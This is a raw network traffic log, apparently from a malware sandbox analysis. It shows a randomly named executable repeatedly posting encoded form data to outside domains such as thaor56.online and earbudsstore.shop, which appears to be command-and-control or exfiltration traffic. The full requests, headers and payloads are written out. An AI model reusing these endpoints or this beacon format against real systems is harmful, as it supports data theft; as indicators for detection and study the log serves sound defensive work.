72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2783<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Nov 29, 2024 03:53:38.402781010 CET	1236	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
Nov 29, 2024 03:53:38.402800083 CET	1236	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
Nov 29, 2024 03:53:38.402812004 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
Nov 29, 2024 03:53:38.402823925 CET	1236	IN	Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
Nov 29, 2024 03:53:38.402834892 CET	1236	IN	Data Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
Nov 29, 2024 03:53:38.402847052 CET	1236	IN	Data Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59 Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
Nov 29, 2024 03:53:38.403036118 CET	1236	IN	Data Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
Nov 29, 2024 03:53:38.403047085 CET	457	IN	Data Raw: 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 Data Ascii: <div class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49838	202.92.5.23	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:45.091362953 CET	769	OUT	POST /cboa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.thaor56.online Origin: http://www.thaor56.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.thaor56.online/cboa/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 39 33 30 71 66 4f 52 33 2f 31 32 6a 49 64 73 4a 63 39 50 64 4b 54 5a 57 46 30 62 30 70 50 67 37 45 6f 4f 30 48 6d 70 32 72 2b 46 63 58 7a 64 69 45 43 4e 7a 32 4a 69 56 67 64 4b 4d 56 57 48 41 4c 6b 72 57 57 43 55 48 30 66 37 6c 47 72 41 50 61 57 63 4e 4e 7a 48 56 51 55 7a 53 6d 46 42 35 38 59 6b 33 4b 70 41 35 51 51 63 4e 5a 45 6e 71 35 2b 6b 6b 74 57 63 4a 4d 78 44 6e 30 48 7a 6e 46 4e 62 59 74 62 6a 7a 58 4b 30 61 39 42 75 70 31 4c 4a 59 45 6c 67 54 6c 69 4e 2b 76 53 43 4c 46 34 46 44 6e 5a 70 4c 65 4c 56 69 73 51 75 73 6f 54 75 45 6f 32 36 71 54 45 3d Data Ascii: QtKtUpvP=XddzRFXpS5iIZ930qfOR3/12jIdsJc9PdKTZWF0b0pPg7EoO0Hmp2r+FcXzdiECNz2JiVgdKMVWHALkrWWCUH0f7lGrAPaWcNNzHVQUzSmFB58Yk3KpA5QQcNZEnq5+kktWcJMxDn0HznFNbYtbjzXK0a9Bup1LJYElgTliN+vSCLF4FDnZpLeLVisQusoTuEo26qTE=
Nov 29, 2024 03:53:46.651587963 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 29 Nov 2024 02:53:46 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Nov 29, 2024 03:53:46.651652098 CET	234	IN	Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49844	202.92.5.23	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:47.782236099 CET	789	OUT	POST /cboa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.thaor56.online Origin: http://www.thaor56.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.thaor56.online/cboa/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 72 67 38 68 55 4f 37 6c 65 70 78 72 2b 46 49 48 7a 63 68 30 43 57 7a 32 45 64 56 6c 64 4b 4d 56 43 48 41 4a 38 72 58 6c 71 58 45 45 66 35 77 57 72 43 42 36 57 63 4e 4e 7a 48 56 51 41 5a 53 6d 4e 42 34 4d 49 6b 34 4c 70 66 6c 67 51 66 45 35 45 6e 75 35 2b 6f 6b 74 57 69 4a 4e 74 35 6e 32 50 7a 6e 45 39 62 62 38 62 67 6f 48 4b 75 55 64 42 2f 36 33 37 4d 58 6d 56 53 5a 56 54 63 6f 38 47 30 4f 7a 4a 76 5a 46 52 42 59 2b 6e 74 79 2f 59 5a 39 59 79 48 65 4c 6d 4b 30 45 52 6c 69 7a 48 72 74 34 43 68 51 30 52 52 35 56 78 6f 43 41 54 45 Data Ascii: QtKtUpvP=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07rg8hUO7lepxr+FIHzch0CWz2EdVldKMVCHAJ8rXlqXEEf5wWrCB6WcNNzHVQAZSmNB4MIk4LpflgQfE5Enu5+oktWiJNt5n2PznE9bb8bgoHKuUdB/637MXmVSZVTco8G0OzJvZFRBY+nty/YZ9YyHeLmK0ERlizHrt4ChQ0RR5VxoCATE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49850	202.92.5.23	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:50.443588972 CET	1806	OUT	POST /cboa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.thaor56.online Origin: http://www.thaor56.online Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.thaor56.online/cboa/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 6a 67 38 58 67 4f 36 45 65 70 77 72 2b 46 4c 48 7a 52 68 30 44 57 7a 32 63 5a 56 6c 68 30 4d 58 36 48 47 71 30 72 51 55 71 58 66 55 66 35 79 57 72 42 50 61 58 42 4e 4a 58 44 56 51 51 5a 53 6d 4e 42 34 4b 4d 6b 78 36 70 66 32 77 51 63 4e 5a 46 6f 71 35 2f 42 6b 74 50 5a 4a 4e 59 62 6e 6e 76 7a 6e 6b 74 62 55 75 44 67 31 58 4b 6f 58 64 41 69 36 33 32 63 58 69 38 70 5a 56 57 4c 6f 38 75 30 4b 6b 4d 32 4f 6d 70 33 43 75 36 50 78 49 4d 67 68 73 79 66 44 59 57 5a 2f 6b 6c 2b 69 69 48 64 6f 50 32 2f 61 6d 6b 49 39 55 70 74 4a 51 6d 79 76 32 41 69 6f 55 34 6a 50 39 67 34 32 4e 2b 59 69 6e 30 36 35 69 54 61 72 68 75 54 38 62 6b 77 64 46 57 7a 34 44 38 4b 54 30 74 4f 63 49 4f 47 46 74 78 41 50 54 7a 2b 68 47 76 56 2f 56 37 4a 34 32 31 52 53 46 5a 6c 47 2f 2f 49 76 70 39 6c 57 4a 37 36 34 44 7a 6d 54 63 59 56 33 6c 55 6e 5a 4c 50 74 58 31 62 55 78 67 38 5a 67 [TRUNCATED] Data Ascii: QtKtUpvP=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07jg8XgO6Eepwr+FLHzRh0DWz2cZVlh0MX6HGq0rQUqXfUf5yWrBPaXBNJXDVQQZSmNB4KMkx6pf2wQcNZFoq5/BktPZJNYbnnvznktbUuDg1XKoXdAi632cXi8pZVWLo8u0KkM2Omp3Cu6PxIMghsyfDYWZ/kl+iiHdoP2/amkI9UptJQmyv2AioU4jP9g42N+Yin065iTarhuT8bkwdFWz4D8KT0tOcIOGFtxAPTz+hGvV/V7J421RSFZlG//Ivp9lWJ764DzmTcYV3lUnZLPtX1bUxg8Zgv6X+9fG03fY12bbqlcRK4yJA6nzE8878oanEnhZ0oK+EqnDG7ZEFdhLq4y1S5Rm81htbwMF6sZN/5jq8DanQhgpS3hWXE0n3zsr5gTIJ2JG3HjAMN2Kxjv9PCg58kW3zshBAK36ovzuoU1TkIzFgZOyn67OF1ROM2d/mvyvVl2ZghygACk6+wbaUWSbWvnQTPos28MI2GPQhkqdgexyQARGAOKEZ0jqd58A32jsAv7ip2/Uqvh8jyM9jUIhiYOG1vfoKce9vyUcU7gsQ9ScqGIAIxkE5tkPeeh0nUu9uUH+iJRXkINfkoKH6PeVd5cCvTZy2Brw/HvGfnmdJLpjhIUrAWRz7nxrMVWJTai1Apj4GAZK5ZiUHuc4AnfhV2uC77ow6Ca86P00HWcNT3BLrHSAEeuloYqGrf6jiO+AJftin1Gr6bITmycG3w7ZuDv4OtyXnzWRElTvynZ+rg54I7iS5w89NcKDX0mkBX9uRxjQMJjCvupGj+gyiqTMLbSpBylfw0GZlZF4Agz9731Vgs2WYL5Anj48Hv4F6UYl1VAW7Hk5xy2NtYy1xtA89vI+uCmbaYWrFdq+CTzauwKVGpDED3hkT7iV9yHm91u1Ix8vrQxWF4QtYPJGuaT41IEiMA290StXQgoOneXKW8/18ua44ekwa/39uyY [TRUNCATED]
Nov 29, 2024 03:53:51.995105028 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 29 Nov 2024 02:53:51 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Nov 29, 2024 03:53:51.995134115 CET	234	IN	Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49857	202.92.5.23	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:53:53.095565081 CET	510	OUT	GET /cboa/?QtKtUpvP=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhiTzjWIK5GaGrrUVA8lRVN39YIo9Jhl2SEWFfoBlbvNzQ==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.thaor56.online Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:53:54.655641079 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 29 Nov 2024 02:53:54 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Nov 29, 2024 03:53:54.655697107 CET	234	IN	Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49877	194.195.220.41	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:54:00.432440042 CET	778	OUT	POST /0gis/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.earbudsstore.shop Origin: http://www.earbudsstore.shop Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.earbudsstore.shop/0gis/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 5a 71 54 36 57 38 75 78 30 44 48 39 7a 32 46 76 6c 38 4f 45 76 54 64 75 45 46 6a 42 32 4d 7a 2f 47 6e 6b 4c 52 6e 35 58 35 32 68 4b 67 4c 38 56 65 53 4d 31 36 49 49 6d 4e 6c 62 42 59 33 6d 59 6f 55 5a 4d 6c 65 65 57 56 45 62 4f 57 48 38 2b 51 4e 5a 69 39 41 34 73 53 34 57 54 4e 34 30 7a 51 78 67 64 58 78 32 54 50 58 4b 54 49 69 65 32 46 66 6c 6e 2b 49 35 68 66 41 4b 69 67 42 2b 69 43 77 41 33 34 6f 4b 6c 45 42 67 35 72 52 36 62 68 49 67 69 57 42 33 2b 6a 35 70 74 32 37 6f 56 66 52 34 32 69 67 67 70 63 4c 63 54 66 7a 56 44 39 43 49 42 45 59 54 71 36 68 63 3d Data Ascii: QtKtUpvP=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWB3+j5pt27oVfR42iggpcLcTfzVD9CIBEYTq6hc=
